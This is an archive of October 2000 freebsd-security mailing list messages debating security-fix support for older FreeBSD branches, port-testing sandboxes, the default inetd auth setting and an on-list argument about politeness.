Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.4i In-Reply-To: <20001003205159.A20891@FreeBSD.org>; from ade@FreeBSD.org on Tue, Oct 03, 2000 at 08:51:59PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Ade Lovett [001003 18:52] wrote: > [cc's trimmed a little] > > On Tue, Oct 03, 2000 at 05:43:13PM -0700, Alfred Perlstein wrote: > > Might I suggest it'd be pretty helpful to have a couple of speedy > > 3.x (and probably 4.x) boxes set up some place with console access > > to make these types of fixes easier for our developers lacking in > > hardware resources. > > What about ports? How do you propose that they be tested, as opposed > to "it-compiles-so-ship-it" on these 3.x boxes if, say, the developer > in question only runs 4.x boxes, with a single not-yet-built 5.x box > for when 5.x settles down? > > Or can we stick with the current ports policy of tracking -stable > and -current only, with a good luck to everyone else? And what does > this policy mean anyway when we have two -stables, with the package > building cluster building for three environments? I think the current ports situation is fine, personally I'd love to see most ports that have existed since a specific branch continue to work on those branches, but that's not very realistic of me. -- -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] "I have the heart of a child; I keep it in a jar on my desk." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 19: 7:57 2000 Delivered-To: freebsd-security@freebsd.org Received: from winston.osd.bsdi.com (winston.osd.bsdi.com [204.216.27.229]) by hub.freebsd.org (Postfix) with ESMTP id B48F237B66E; Tue, 3 Oct 2000 19:07:44 -0700 (PDT) Received: from winston.osd.bsdi.com (jkh@localhost [127.0.0.1]) by winston.osd.bsdi.com (8.11.0/8.9.3) with ESMTP id e9427fX85382; Tue, 3 Oct 2000 19:07:41 -0700 (PDT) (envelope-from jkh@winston.osd.bsdi.com) To: Kris Kennaway Cc: Paul Richards , Christopher Masto , Warner Losh , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: How long for -stable [ Re: cvs commit: src/usr.bin/finger finger.c ] In-Reply-To: Message from Kris Kennaway of "Tue, 03 Oct 2000 17:34:14 PDT." <20001003173414.A58372@freefall.freebsd.org> Date: Tue, 03 Oct 2000 19:07:41 -0700 Message-ID: <85378.970625261@winston.osd.bsdi.com> From: Jordan Hubbard Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I suggest that in practise it will be all but impossible for people to > get active bugfix support for 3.x, and we'd probably be giving a false > impression if we say otherwise. Oh, I dunno, I think you may still be operating from the old "economic assumptions" with these concerns. We have a lot more people than we used, after all, to and just the general buy-in to this thread so far would tend to indicate that interest level in legacy support is higher than it has been in recent memory. We just need more volunteers who are committed to r.v-stable (-solid? -stale?) and its upkeep, something which I'd expect to be somewhat easier to recruit part-time help for than -current since the pace of life is much more relaxed there and; you can get people to sign up without having to make a truly major full-time commitment to development. Nobody also expects 50 commits a year on a -stale branch, just 5 or 6 well-chosen ones, and even with part-time help, cvs can easily provide the requisite diffs to someone with a very specific point of focus (it's only you try to look at all of src between a branch that life starts sucking rocks). I also might not have said this 6 months ago when things like OpenSSL and RSA were not integrated and enhancing security really often did involve major infrastructural overhauls before you could address even some very basic security issue. We've gotten both far more functional and more modular as of late there, however, and it would certainly be my hope that future security fixes will generally be the easiest to merge without requiring interface changes or tons of infrastructural support to pull off (a buffer overflow or missing consistency check being a fairly stand-alone change, neh?). Or maybe I'm just smoking crack, but I honestly believe we have to at least try this. FreeBSD has really done some major growing up as OS in the last 3 years alone and I think we simply have to make periodic shifts in our MO to compensate or we're dogmeat. I'm also fine with your suggestion that we first try it for a few months to see how it truly goes before announcing the policy change to the world, but we should at least stop actively warning people away if we're going to try this at all seriously. We can be conservative and hold back on the horn-blowing without dire effect to this "experiment", but we can't have mixed messages going out without compromising it, either. > Speaking for myself as part of the security team, I don't want to > support 3.x for security fixes any more, since it's been just too damn To me, this is only an argument that you need more help, not that the fundamental idea of supporting security fixes for 3.x is somehow unsound. :-) It seems like you essentially agree in your next two paragraphs anyway, so can we now see a show of hands for "deputies" who'd be willing to work on back-porting even just security enhancements to 3.x (and, eventually, 4.x)? - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 19:12:37 2000 Delivered-To: freebsd-security@freebsd.org Received: from winston.osd.bsdi.com (winston.osd.bsdi.com [204.216.27.229]) by hub.freebsd.org (Postfix) with ESMTP id BE89237B502; Tue, 3 Oct 2000 19:12:30 -0700 (PDT) Received: from winston.osd.bsdi.com (jkh@localhost [127.0.0.1]) by winston.osd.bsdi.com (8.11.0/8.9.3) with ESMTP id e942COX85536; Tue, 3 Oct 2000 19:12:24 -0700 (PDT) (envelope-from jkh@winston.osd.bsdi.com) To: Ade Lovett Cc: Alfred Perlstein , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org Subject: Re: How long for -stable [ Re: cvs commit: src/usr.bin/finger finger.c ] In-Reply-To: Message from Ade Lovett of "Tue, 03 Oct 2000 20:51:59 CDT." <20001003205159.A20891@FreeBSD.org> Date: Tue, 03 Oct 2000 19:12:24 -0700 Message-ID: <85532.970625544@winston.osd.bsdi.com> From: Jordan Hubbard Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > What about ports? How do you propose that they be tested, as opposed > to "it-compiles-so-ship-it" on these 3.x boxes if, say, the developer > in question only runs 4.x boxes, with a single not-yet-built 5.x box > for when 5.x settles down? I think we need to go back to providing dynamically created "sandboxes" again, where the would-be tester can quickly create a minimal (e.g. nothing more than strictly required) chroot tree from scratch, chroot into it and build the port in question so that it and all its deps get properly built and tested. We used to do that back in the "old days" and then stopped, probably because people got worried about root access for chroot and killed sandboxes rather than simply firewalling the heck out of a sacrificial box and moving them there. Anyway, these sandboxes should furthermore live on a 3.x reference box which the project provides (so the developer's not on the hook for it) and is specially selected for having cojones muy grande in the disk and CPU department. I can arrange the hardware, I'm fairly confident of that part. - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 19:15:19 2000 Delivered-To: freebsd-security@freebsd.org Received: from winston.osd.bsdi.com (winston.osd.bsdi.com [204.216.27.229]) by hub.freebsd.org (Postfix) with ESMTP id 6F4CD37B66C; Tue, 3 Oct 2000 19:15:12 -0700 (PDT) Received: from winston.osd.bsdi.com (jkh@localhost [127.0.0.1]) by winston.osd.bsdi.com (8.11.0/8.9.3) with ESMTP id e942F8X85592; Tue, 3 Oct 2000 19:15:09 -0700 (PDT) (envelope-from jkh@winston.osd.bsdi.com) Cc: Kris Kennaway , Paul Richards , Christopher Masto , Warner Losh , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org Subject: Re: How long for -stable [ Re: cvs commit: src/usr.bin/finger finger.c ] In-Reply-To: Message from Jordan Hubbard of "Tue, 03 Oct 2000 19:07:41 PDT." <85378.970625261@winston.osd.bsdi.com> Date: Tue, 03 Oct 2000 19:15:08 -0700 Message-ID: <85588.970625708@winston.osd.bsdi.com> From: Jordan Hubbard Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Just to follow up to that message - please ignore the punctuation and the flagrant, confusing misuse thereof. I clearly wrote, badly edited, then sent that message way too quickly. :) - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 19:22:11 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D30C437B66E; Tue, 3 Oct 2000 19:21:59 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id TAA18026; Tue, 3 Oct 2000 19:21:59 -0700 (PDT) (envelope-from kris@FreeBSD.org) Date: Tue, 3 Oct 2000 19:21:58 -0700 From: Kris Kennaway To: Jordan Hubbard Cc: Kris Kennaway , Paul Richards , Christopher Masto , Warner Losh , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: How long for -stable [ Re: cvs commit: src/usr.bin/finger finger.c ] Message-ID: <20001003192158.A14805@freefall.freebsd.org> References: <85378.970625261@winston.osd.bsdi.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <85378.970625261@winston.osd.bsdi.com>; from jkh@winston.osd.bsdi.com on Tue, Oct 03, 2000 at 07:07:41PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Oct 03, 2000 at 07:07:41PM -0700, Jordan Hubbard wrote: > Or maybe I'm just smoking crack, but I honestly believe we have to at > least try this. FreeBSD has really done some major growing up as OS I was agreeing with the "try this and see if it works", just not the "and it will be better" implication by announcing that 3.x will be supported better, even before anyone's made the attempt and tried not to fail at it :-) > > Speaking for myself as part of the security team, I don't want to > > support 3.x for security fixes any more, since it's been just too damn > > To me, this is only an argument that you need more help, not that the > fundamental idea of supporting security fixes for 3.x is somehow > unsound. :-) It seems like you essentially agree in your next two > paragraphs anyway, so can we now see a show of hands for "deputies" > who'd be willing to work on back-porting even just security > enhancements to 3.x (and, eventually, 4.x)? The idea of supporting 2.x fixes isn't fundamentally unsound either, it's just that no-one cares enough to do the work. So if someone wants to take on the job of backporting 3.x fixes, we can keep doing it, otherwise if no-one is we'll stop (based on discussions amongst the security officer team I think it's fair to say none of us have the time/desire to do it) Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 20:20: 2 2000 Delivered-To: freebsd-security@freebsd.org Received: from puck.firepipe.net (mcut-b-167.resnet.purdue.edu [128.211.209.167]) by hub.freebsd.org (Postfix) with ESMTP id B0FE637B66C; Tue, 3 Oct 2000 20:19:50 -0700 (PDT) Received: by puck.firepipe.net (Postfix, from userid 1000) id AA5C11953; Tue, 3 Oct 2000 22:20:04 -0500 (EST) Date: Tue, 3 Oct 2000 22:20:04 -0500 From: Will Andrews To: Paul Richards Cc: Jordan Hubbard , Christopher Masto , Warner Losh , Kris Kennaway , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org Subject: Re: cvs commit: src/usr.bin/finger finger.c Message-ID: <20001003222004.Z41798@puck.firepipe.net> Reply-To: Will Andrews Mail-Followup-To: Will Andrews , Paul Richards , Jordan Hubbard , Christopher Masto , Warner Losh , Kris Kennaway , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org References: <83262.970607906@winston.osd.bsdi.com> <39DA6055.594B13E4@originative.co.uk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <39DA6055.594B13E4@originative.co.uk>; from paul@originative.co.uk on Tue, Oct 03, 2000 at 11:40:21PM +0100 X-Operating-System: FreeBSD 4.1-STABLE i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Oct 03, 2000 at 11:40:21PM +0100, Paul Richards wrote: > I think you're looking at it the wrong way around. The stable team > wouldn't be putting in a lot of hours reviewing stable commits. Stable > commits would only occur if the stable team did them i.e. no-one else > would be allowed to commit to stable. The stable team would then monitor > -current, noting commits that are bug fixes, and slating them for a MFC > at a later date when it's felt they've had enough of a shakeout. Uhm, I doubt you can come up with a comprehensive team of people who can figure out the implications of X, Y, or Z to MFC. This is a large project, and everyone has different skills/knowledge about different things. Sorry, but no go on this. I still think every committer should have a couple other eyes lint their work. -- Will Andrews - Physics Computer Network wench The Universal Answer to All Problems - "It has something to do with physics." -- Comic on door of Room 240, Physics Building, Purdue University To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 20:38:50 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id D4E0A37B502; Tue, 3 Oct 2000 20:38:43 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id e943cfM13104; Tue, 3 Oct 2000 21:38:42 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id VAA32448; Tue, 3 Oct 2000 21:38:39 -0600 (MDT) Message-Id: <200010040338.VAA32448@harmony.village.org> To: Jordan Hubbard Subject: Re: How long for -stable [ Re: cvs commit: src/usr.bin/finger finger.c ] Cc: developers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Tue, 03 Oct 2000 19:07:41 PDT." <85378.970625261@winston.osd.bsdi.com> References: <85378.970625261@winston.osd.bsdi.com> Date: Tue, 03 Oct 2000 21:38:39 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <85378.970625261@winston.osd.bsdi.com> Jordan Hubbard writes: : > Speaking for myself as part of the security team, I don't want to : > support 3.x for security fixes any more, since it's been just too damn : : To me, this is only an argument that you need more help, not that the : fundamental idea of supporting security fixes for 3.x is somehow : unsound. :-) It seems like you essentially agree in your next two : paragraphs anyway, so can we now see a show of hands for "deputies" : who'd be willing to work on back-porting even just security : enhancements to 3.x (and, eventually, 4.x)? Historically, we've had a few people step up to the plate for this and then disappear. I'm doubtful that something like this will work in practice. We had the same debate at the end of life for the 2.x branch and no one offered to fill in the void. Having said that, I would support having someone in the loop as part of the SO team that would do nothing but 3.x support. We can certainly try things out, but my expectations are low. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 20:49:50 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66]) by hub.freebsd.org (Postfix) with ESMTP id 4E8F137B66E; Tue, 3 Oct 2000 20:49:38 -0700 (PDT) Received: from nomad.yogotech.com (nomad.yogotech.com [206.127.123.131]) by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id VAA10020; Tue, 3 Oct 2000 21:49:03 -0600 (MDT) (envelope-from nate@nomad.yogotech.com) Received: (from nate@localhost) by nomad.yogotech.com (8.8.8/8.8.8) id VAA27923; Tue, 3 Oct 2000 21:49:02 -0600 (MDT) (envelope-from nate) Date: Tue, 3 Oct 2000 21:49:02 -0600 (MDT) Message-Id: <200010040349.VAA27923@nomad.yogotech.com> From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: Kris Kennaway Cc: Jordan Hubbard , Paul Richards , Christopher Masto , Warner Losh , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org Subject: Re: How long for -stable [ Re: cvs commit: src/usr.bin/finger finger.c ] In-Reply-To: <20001003192158.A14805@freefall.freebsd.org> References: <85378.970625261@winston.osd.bsdi.com> <20001003192158.A14805@freefall.freebsd.org> X-Mailer: VM 6.34 under 19.16 "Lille" XEmacs Lucid Reply-To: nate@yogotech.com (Nate Williams) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > The idea of supporting 2.x fixes isn't fundamentally unsound either, > it's just that no-one cares enough to do the work. For what it's worth, I've got a couple of backported kernel fixes on my box (including at least one security fix) that are there because I am stuck on 2.2 due to hardware issues, as well as the fact that it simply 'works'. However, I didn't bother making the fix available because I felt it might give people the wrong impression. Just because *I* am willing to support a really old release such as FreeBSD 2, I still feel the users should be 'encouraged' to use newer releases. By not making those fixes available (which were in fact rather trivial to do), those folks who aren't capable of fixing the bugs will be more likely to upgrade their systems to a newer 'more supported' release. I think supporting older releases *really* needs to be done by a commercial entity (or at least folks who have a commercial stake in seeing it done), since the majority of developers are in it for the development fun, and product support is all but fun. :( Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 20:55: 6 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id CB42237B503; Tue, 3 Oct 2000 20:54:54 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id e943sqM13177; Tue, 3 Oct 2000 21:54:52 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id VAA32643; Tue, 3 Oct 2000 21:54:51 -0600 (MDT) Message-Id: <200010040354.VAA32643@harmony.village.org> To: Alfred Perlstein Subject: Re: How long for -stable [ Re: cvs commit: src/usr.bin/finger finger.c ] Cc: Jordan Hubbard , Paul Richards , Christopher Masto , Kris Kennaway , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org In-reply-to: Your message of "Tue, 03 Oct 2000 17:43:13 PDT." <20001003174313.U27736@fw.wintelcom.net> References: <20001003174313.U27736@fw.wintelcom.net> <84222.970618959@winston.osd.bsdi.com> Date: Tue, 03 Oct 2000 21:54:51 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <20001003174313.U27736@fw.wintelcom.net> Alfred Perlstein writes: : * Jordan Hubbard [001003 17:23] wrote: : > : > We could also look into providing an "update" command or something : > which would pull either sources or binaries over from a snapshot box : > and make the process of getting up to the branch-head a lot easier. : > It's long been on my wishlist and I'm at the point where I'd be : > willing to devote some BSDi resources to both writing the software : > and setting up a build box for creating the relevant binaries on an : > ongoing basis. : : You ought to go to the cube next to you, Mike Smith said he had something : along the lines of that, er, something that would generate a binary : delta that could be spammed over an existing install. I've worked at companies that used cvsup to do this. I also setup an experimental cvsup box at one point to do this and it was fairly slick to watch. Ran into lots of problems from time to time with certain binary changes, but that was nothing a reboot on the new machine wouldn't fix. Oh, I think there was also an issue with replacing init, but I may have been misremembering. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 20:56: 7 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id A840137B503; Tue, 3 Oct 2000 20:55:58 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id e943tvM13196; Tue, 3 Oct 2000 21:55:57 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id VAA32673; Tue, 3 Oct 2000 21:55:56 -0600 (MDT) Message-Id: <200010040355.VAA32673@harmony.village.org> To: Michael Bryan Subject: Re: How long for -stable [ Re: cvs commit: src/usr.bin/finger finger.c ] Cc: freebsd-security@FreeBSD.org, developers@FreeBSD.org In-reply-to: Your message of "Tue, 03 Oct 2000 18:03:37 PDT." <39DA81E9.FD461622@ursine.com> References: <39DA81E9.FD461622@ursine.com> <84222.970618959@winston.osd.bsdi.com> <20001003173414.A58372@freefall.freebsd.org> Date: Tue, 03 Oct 2000 21:55:56 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <39DA81E9.FD461622@ursine.com> Michael Bryan writes: : Well, it's been said before, but I'll add my two cents to this. Support : for at least security-related issues really needs to be provided for a : reasonable duration, probably about a year, maybe longer, after a release : comes out. No one is disagreeing that this isn't wanted by users. The hard part is finding bodies to do the work. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 21:13: 7 2000 Delivered-To: freebsd-security@freebsd.org Received: from homer.softweyr.com (bsdconspiracy.net [208.187.122.220]) by hub.freebsd.org (Postfix) with ESMTP id 6214237B502 for ; Tue, 3 Oct 2000 21:13:02 -0700 (PDT) Received: from localhost ([127.0.0.1] helo=softweyr.com ident=Fools trust ident!) by homer.softweyr.com with esmtp (Exim 3.16 #1) id 13gg5U-00006q-00; Tue, 03 Oct 2000 22:23:24 -0600 Message-ID: <39DAB0BC.BE78E4DA@softweyr.com> Date: Tue, 03 Oct 2000 22:23:24 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.75 [en] (X11; U; FreeBSD 4.1-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: Brett Glass Cc: security@FreeBSD.ORG Subject: Re: politeness References: <4.3.2.7.2.20001003103503.04c68240@localhost> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Brett Glass wrote: > > At 03:53 AM 10/3/2000, Wes Peters wrote: > > >> Everyone has a right to write to the list and share his thoughts. > > > >No, the list has a charter. This is a republic, not a democracy. > > Does that mean that to get something posted to the list, I need to > contact my representative... No, it means the list has a purpose and off-topic rants don't belong here. This thread long since crossed that line, you know this just as well as I do, and yet you continue the rant publicly. I'll not be among those voting to twist your squelch knob, because I've just stuck you back in my personal black-hole filter. You're an ass of the first order and I will not waste my time conversing with you for some time to come. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 21:24:20 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 08BFD37B66C for ; Tue, 3 Oct 2000 21:24:19 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id WAA26677; Tue, 3 Oct 2000 22:24:11 -0600 (MDT) Message-Id: <4.3.2.7.2.20001003222242.00e3d720@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Tue, 03 Oct 2000 22:24:08 -0600 To: Wes Peters From: Brett Glass Subject: Re: politeness Cc: security@FreeBSD.ORG In-Reply-To: <39DAB0BC.BE78E4DA@softweyr.com> References: <4.3.2.7.2.20001003103503.04c68240@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 10:23 PM 10/3/2000, Wes Peters wrote: >You're an ass of the first order and I will >not waste my time conversing with you for some time to come. So much for politeness! Thread abandoned. --Brett "I don't think you can put that cat back in the bottle." -- Kevin Surace, PERFECT.COM To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 21:56: 5 2000 Delivered-To: freebsd-security@freebsd.org Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id 0886C37B503 for ; Tue, 3 Oct 2000 21:56:02 -0700 (PDT) Received: from 149.211.6.64.reflexcom.com ([64.6.211.149]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Tue, 3 Oct 2000 21:54:46 -0700 Received: (from cjc@localhost) by 149.211.6.64.reflexcom.com (8.11.0/8.11.0) id e944twB75626; Tue, 3 Oct 2000 21:55:58 -0700 (PDT) (envelope-from cjc) Date: Tue, 3 Oct 2000 21:55:58 -0700 From: "Crist J . Clark" To: Garrett Wollman Cc: David Pick , security@FreeBSD.ORG Subject: Re: cvs commit: src/etc inetd.conf Message-ID: <20001003215558.W25121@149.211.6.64.reflexcom.com> Reply-To: cjclark@alum.mit.edu References: <200010031705.LAA23799@nomad.yogotech.com> <200010031722.NAA41823@khavrinen.lcs.mit.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <200010031722.NAA41823@khavrinen.lcs.mit.edu>; from wollman@khavrinen.lcs.mit.edu on Tue, Oct 03, 2000 at 01:22:27PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Oct 03, 2000 at 01:22:27PM -0400, Garrett Wollman wrote: > < said: > > > gets no response (after a time-out) it would be entitled to retry a > > few times in case of packet loss. *But* if it gets a RST, which is a > > If net.inet.tcp.blackhole is set, an RST will not be emitted. OK, we're drifting from the point here. Someone suggested that auth be turned on by default in inetd.conf. One of the reasons given was to prevent sendmail delays. It was then /correctly/ pointed out that when sendmail receives a RST[0], an indication that there is no auth listener, the mail transfer will occur without delay. net.inet.tcp.blackhole is not turned on by default. Someone who knows enough to fiddle with that setting can be expected to be able to turn auth on or off in inetd.conf depending on how they want things to run. So, since in the _default_ setup, there actually is no delay to sendmail if auth is not activated, there is no argument to have it turned on in the default. Someone mentioned firewalls dropping the auth connection causing delays. It is a moot point. If the firewall drops the incoming auth, it makes no difference if the mail server has auth running or not since the connection never reaches it. [0] Yes, technically this is really happening at the transport layer within TCP. sendmail does not know aything about SYNs, ACKs, RSTs, and timeouts. sendmail tries to connect to the auth on the remote machine. The TCP connection fails slowly if it makes several retries and times out. The TCP connection fails quickly if it gets a RST. Either way, this is not directly related to sendmail, but the TCP/IP stack. -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 22: 0: 0 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 9BEB937B502 for ; Tue, 3 Oct 2000 21:59:56 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id e944xsM13541; Tue, 3 Oct 2000 22:59:54 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id WAA33311; Tue, 3 Oct 2000 22:59:54 -0600 (MDT) Message-Id: <200010040459.WAA33311@harmony.village.org> To: Wes Peters Subject: Re: Security and FreeBSD, my overall perspective Cc: Jordan Hubbard , security@FreeBSD.ORG In-reply-to: Your message of "Tue, 03 Oct 2000 01:41:12 MDT." <39D98D98.B0627C08@softweyr.com> References: <39D98D98.B0627C08@softweyr.com> <2376.970339459@winston.osd.bsdi.com> <200009302258.QAA13969@harmony.village.org> Date: Tue, 03 Oct 2000 22:59:54 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <39D98D98.B0627C08@softweyr.com> Wes Peters writes: : N == 3 { 'green', 'yellow', 'red' }. If you're feeling like a telco, throw : 'blue' in there somewhere, though nobody really seems to understand what : 'blue' really means. Green, blue, black. Works great for ski runs :-) Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 22: 8:41 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 7446A37B502 for ; Tue, 3 Oct 2000 22:08:39 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id e9458bM13585; Tue, 3 Oct 2000 23:08:38 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id XAA33386; Tue, 3 Oct 2000 23:08:37 -0600 (MDT) Message-Id: <200010040508.XAA33386@harmony.village.org> To: Brett Glass Subject: Re: cvs commit: src/usr.bin/finger finger.c Cc: freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Tue, 03 Oct 2000 17:55:55 MDT." <4.3.2.7.2.20001003175130.043dc4c0@localhost> References: <4.3.2.7.2.20001003175130.043dc4c0@localhost> <200010032326.e93NQ7H17213@netplex.com.au> <20001003155638.B73409@hub.freebsd.org> <200010032326.e93NQ7H17213@netplex.com.au> Date: Tue, 03 Oct 2000 23:08:37 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <4.3.2.7.2.20001003175130.043dc4c0@localhost> Brett Glass writes: : At 05:42 PM 10/3/2000, Alfred Perlstein wrote: : : >There's a large difference between kernel and userland here, kernel : >changes need to be backported relatively quickly while userland : >can allow for a longer test period. Seperate policies may serve : >us better than one that covers the entire tree. : : What about root compromises in userland -- e.g. in setuid apps, daemons : that run (or at least start) as root, etc.? Root compromises invoke the compelling reason clause, as do most security fixes. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 22:13: 8 2000 Delivered-To: 